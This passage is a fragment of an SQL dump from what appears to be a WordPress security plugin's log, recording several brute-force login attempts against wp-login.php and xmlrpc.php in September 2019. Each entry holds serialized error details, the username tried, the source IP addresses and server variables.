Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"38656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFTZI75s89pqgR69SLZnAAAAYM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756580.4025\";s:12:\"REQUEST_TIME\";s:10:\"1568756580\";}}','notice','2019-09-17 21:43:01','2019-09-17 21:43:00',17739896,19230808,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24759,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"39068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFTZyqbKGlf1IVly7N6eAAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756583.7072\";s:12:\"REQUEST_TIME\";s:10:\"1568756583\";}}','notice','2019-09-17 21:43:05','2019-09-17 21:43:04',18256256,19552968,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24760,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.157.149\";s:11:\"REMOTE_PORT\";s:5:\"45910\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFUVY75s89pqgR69SLaMwAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756821.6073\";s:12:\"REQUEST_TIME\";s:10:\"1568756821\";}}','notice','2019-09-17 21:47:03','2019-09-17 21:47:02',17739896,19230808,'https://bintara.com.my/wp-login.php',1,0,'134.209.157.149'),(24761,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.157.149\";s:11:\"REMOTE_PORT\";s:5:\"46674\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFUWY75s89pqgR69SLaNgAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756825.5215\";s:12:\"REQUEST_TIME\";s:10:\"1568756825\";}}','notice','2019-09-17 21:47:07','2019-09-17 21:47:05',18256256,19552968,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.157.149'),(24762,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.36.182.93\";s:11:\"REMOTE_PORT\";s:5:\"44450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFXIG4SfF9g@8lNlxwiaAAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568757536.1964\";s:12:\"REQUEST_TIME\";s:10:\"1568757536\";}}','notice','2019-09-17 21:58:57','2019-09-17 21:58:56',17742424,19235320,'https://bintara.com.my/wp-login.php',1,0,'69.36.182.93'),(24763,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.36.182.93\";s:11:\"REMOTE_PORT\";s:5:\"45508\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFXIyqbKGlf1IVly7N7GAAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568757539.2408\";s:12:\"REQUEST_TIME\";s:10:\"1568757539\";}}','notice','2019-09-17 21:59:00','2019-09-17 21:58:59',18254360,19554240,'https://bintara.com.my/xmlrpc.php',1,0,'69.36.182.93'),(24764,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"59544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFZd475s89pqgR69SLcywAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568758135.6905\";s:12:\"REQUEST_TIME\";s:10:\"1568758135\";}}','notice','2019-09-17 22:08:57','2019-09-17 22:08:56',17740024,19231120,'https://bintara.com.my/wp-login.php',1,0,'14.248.83.23'),(24765,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"60380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFZfyqbKGlf1IVly7N7lQAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568758143.4339\";s:12:\"REQUEST_TIME\";s:10:\"1568758143\";}}','notice','2019-09-17 22:09:05','2019-09-17 22:09:03',18255992,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'14.248.83.23'),(24766,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"45478\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFaHiqbKGlf1IVly7N7tAAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568758302.6062\";s:12:\"REQUEST_TIME\";s:10:\"1568758302\";}}','notice','2019-09-17 22:11:43','2019-09-17 22:11:42',17742824,19234216,'https://bintara.com.my/wp-login.php',1,0,'5.196.12.2'),(24767,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 